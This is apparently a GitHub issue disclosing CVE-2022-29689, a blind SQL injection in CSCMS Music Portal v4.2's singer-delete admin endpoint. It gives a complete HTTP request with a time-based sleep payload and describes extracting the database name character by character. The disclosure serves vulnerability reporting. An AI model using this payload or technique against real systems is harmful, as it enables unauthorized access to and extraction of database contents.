Headline
CVE-2022-29689: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #28 · chshcms/cscms
CSCMS Music Portal System v4.2 was discovered to contain a blind SQL injection vulnerability via the id parameter at /admin.php/singer/admin/singer/del.
Details
there is a Injection vulnerability exists in singer_Singer.php_del
After logging in, the administrator needs to add a singer first and then delete the singer. When deleting the singer, SQL injection vulnerability is generated. The injection point is ID, and the constructed malicious payload is as follows
POST /admin.php/singer/admin/singer/del?yid=3 HTTP/1.1
Host: cscms.test
Content-Length: 4
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://cscms.test
Referer: http://cscms.test/admin.php/singer/admin/singer?yid=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=v1ahrkd5h84dsm4ftla4ruuks41kb526
Connection: close
id=1)and(sleep(5))--+
You can see that success makes the server sleep
Construct payload database
There is blind SQL injection. Because the database name is "cscms", the string returned by select database() starts with 'C’, substr ((select + database()), 1,1) = ‘C’ is true, and the verification is correct